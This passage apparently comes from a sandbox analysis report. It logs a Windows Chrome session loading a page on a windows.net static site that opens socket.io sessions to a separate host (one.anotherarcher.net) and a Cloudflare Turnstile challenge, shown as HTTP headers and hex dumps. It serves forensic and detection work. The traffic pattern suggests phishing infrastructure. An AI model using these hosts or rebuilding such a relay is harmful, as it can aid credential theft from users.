                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC1369INData Raw: 66 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b 76 61 72 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 73 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 66 65 65 64 62 61 63 6b 22 2c 73 2e 69 64 3d
                                                                                                                                                                                                                                Data Ascii: f.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";var s=document.createElement("div");s.className="cf-turnstile-feedback",s.id=


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                25192.168.2.44978179.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:06 UTC643OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB0Qw HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:06 UTC225INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:06 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 118
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:06 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 6c 39 4f 66 77 62 54 47 6d 4d 4d 75 5a 74 31 70 41 41 4e 4f 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                                                                                                                                                                                Data Ascii: 0{"sid":"l9OfwbTGmMMuZt1pAANO","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                26192.168.2.44978379.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:07 UTC586OUTGET /socket.io/?EIO=4&transport=websocket&sid=l9OfwbTGmMMuZt1pAANO HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Sec-WebSocket-Key: 4zZ97WFKUPrU0KaIQeeRSA==
                                                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                                                2024-10-03 20:57:07 UTC207INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:07 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                2024-10-03 20:57:07 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 22{"code":3,"message":"Bad request"}0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                27192.168.2.44978279.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:07 UTC728OUTPOST /socket.io/?EIO=4&transport=polling&t=P9KB0j8&sid=l9OfwbTGmMMuZt1pAANO HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 2
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Content-type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:07 UTC2OUTData Raw: 34 30
                                                                                                                                                                                                                                Data Ascii: 40
                                                                                                                                                                                                                                2024-10-03 20:57:07 UTC207INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:07 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 2
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:07 UTC2INData Raw: 6f 6b
                                                                                                                                                                                                                                Data Ascii: ok


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                28192.168.2.44978479.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:07 UTC668OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB0jB&sid=l9OfwbTGmMMuZt1pAANO HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:07 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:07 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 32
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:07 UTC32INData Raw: 34 30 7b 22 73 69 64 22 3a 22 69 6b 4c 56 72 77 37 4e 45 42 44 77 46 79 58 4b 41 41 4e 50 22 7d
                                                                                                                                                                                                                                Data Ascii: 40{"sid":"ikLVrw7NEBDwFyXKAANP"}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                29192.168.2.44978540.126.31.69443
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:07 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                Content-Length: 4775
                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                2024-10-03 20:57:07 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                2024-10-03 20:57:07 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                Expires: Thu, 03 Oct 2024 20:56:07 GMT
                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                x-ms-route-info: C533_BAY
                                                                                                                                                                                                                                x-ms-request-id: f2f1f078-b536-4fcd-a1eb-d2914baa6022
                                                                                                                                                                                                                                PPServer: PPV: 30 H: PH1PEPF00011F7F V: 0
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:07 GMT
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 1918
                                                                                                                                                                                                                                2024-10-03 20:57:07 UTC1918INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                30192.168.2.44978979.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:08 UTC389OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB0Qw HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:08 UTC225INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:08 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 118
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:08 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 45 58 4d 6e 6f 69 72 36 6f 62 39 32 45 7a 73 6e 41 41 4e 51 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                                                                                                                                                                                Data Ascii: 0{"sid":"EXMnoir6ob92EzsnAANQ","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                31192.168.2.44979079.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:08 UTC414OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB0j8&sid=l9OfwbTGmMMuZt1pAANO HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:09 UTC223INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:09 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:09 UTC1INData Raw: 31
                                                                                                                                                                                                                                Data Ascii: 1


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                32192.168.2.449792104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:08 UTC823OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/sjco4/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:08 UTC1369INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:08 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 165128
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                                accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                referrer-policy: same-origin
                                                                                                                                                                                                                                content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                                                                                                                                                document-policy: js-profiling
                                                                                                                                                                                                                                critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                2024-10-03 20:57:08 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 63 66 64 37 63 35 64 65 65 39 33 32 66 34 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: Server: cloudflareCF-RAY: 8ccfd7c5dee932f4-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:08 UTC1317INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                                                                                                2024-10-03 20:57:08 UTC1369INData Raw: 25 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62
                                                                                                                                                                                                                                Data Ascii: %;margin:0;overflow:hidden;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-web
                                                                                                                                                                                                                                2024-10-03 20:57:08 UTC1369INData Raw: 67 68 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 30 70 78 7d 23 73 75 63 63 65 73 73 2d 70 72 65 2d 69 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74
                                                                                                                                                                                                                                Data Ascii: ght:30px;width:30px}#success-pre-i line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;st
